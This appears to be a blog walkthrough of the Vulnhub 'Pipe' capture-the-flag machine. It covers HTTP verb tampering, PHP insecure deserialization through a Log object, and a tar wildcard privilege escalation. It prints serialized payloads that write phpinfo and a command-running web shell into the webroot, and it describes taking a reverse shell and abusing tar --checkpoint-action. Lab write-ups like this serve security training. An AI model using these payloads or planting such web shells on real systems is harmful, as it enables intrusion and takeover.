Pipe Vulnhub-CTF Walkthrough ( Insecure Deserialization in PHP)
Hello Pentester, in this blog we will try to solve pipe CTF challenge.Pipe is a vulnerable machine posted on vulnhub which can be found here-https://www.vulnhub.com/entry/devrandom-pipe,124/
Steps for cracking CTF challenge
Setup the vulnhub machine and Run a quick arp-scan to find the IP address of Pipe VM
Required IP address found is — 10.104.30.128, let’s do enumeration.
Run a quick nmap scan as shown
Nmap scan shows that the VM has 3 open ports 80,22, 111.
We open our browser to check 192.168.28.131:80 but we need to provide credentials to proceed ahead. Generic attempts such as admin:admin, admin:password failed. We then used burpsuite to see if we can find out something.
Request intercepted by burp is as shown
Let’s play around with the request, We changed the request before forwarding to the server, we changed GET to GETS and we were able to see a page as shown below
GET request used to prompt us for authentication but this did not.
Let’s use dirbuster, here we found an interesting directory scriptz/
The scriptz directory has some files. The file php.js has javascript equivalent of serialize function. We also saw a log.php.BAK file which seems to be a logger file.
Checking for the source code of the web page we found scriptz/php.js is there
php.js
log.php.BAK
It seems that this logger file will write itself on the webroot. This seems interesting to us especially if we can manipulate the `data` field submitted to the file.
Now let’s go back to the index page wherein we found a hyperlink at the bottom of page which get some artist information. This can also be checked in the page source code.
Page source discloses that the page includes the php.js file to call the serialize API and it pass some arguments to it.
We now intercept the request for artist information in burp.
param field is a dynamic. Let’s send the content to the Decoder tab of burp ( Right Click and choose Send to Decoder tab). At the decoder tab we used the Smart Decoder to decode the param.
It seems that a `Info` type object is being created. We know that a `Log` object will invoke the logger file and will allow us to write to the webroot. Lets try to tweak the request so that we can write some data to the webroot via Log object.
We included the phpinfo() basic php script as shown in below Payload.
O:3:”Log”:2:{s:8:”filename”;s:28:”/var/www/html/scriptz/me.php”;s:4:”data”;s:19:”<?php phpinfo(); ?>”;}
We encode the request using the URL encoder and then forward it to the server. Here is our modified request.
We saw that the command was executed in the browser.
Since we can run arbitrary command we can try to get a reverse shell to our attacking machine. For this we created another file in the webroot.
Payload -
O:3:”Log”:2:{s:8:”filename”;s:29:”/var/www/html/scriptz/shell.php”;s:4:”data”;s:41:”<?php%20$cmd%3d$_GET[‘cmd’];%20system($cmd);%20?>”;}
As it can be seen backdoor is created after encoding and forwarding the above payload in the request with the same technique as shown above for arbitrary phpinfo() command.
Let’s start a netcat listener on our Kali machine.
Access the shell.php file with giving the cmd parameter in URL, as shown id command is executed.
Lets take the reverse shell on our listening netcat port.
And boom… we have got local shell.
Lets try for privilege escalation now.
Spawn tty shell with below command
Let’s enumerate further for the privesc.
Checking /etc/crontab exposed the script /usr/bin/compress.sh which was world readable.
The backup script uses * to perform a backup of all files of directory /home/rene/backup/
Due to improperly configured file system permission on this backup directory, It is possible to create some files in the backup directory which tar will process when it backs up the files in the directory.
Tar’s — checkpoint-action parameter can be abused to execute arbitrary commands as the user executing the tar binary.
And here is the root shell.
References-
https://resources.infosecinstitute.com/devrandom-pipe-ctf-walkthrough/#gref
http://oldsmokingjoe.blogspot.com/2015/12/dfdf-setsharsethernetpara.html
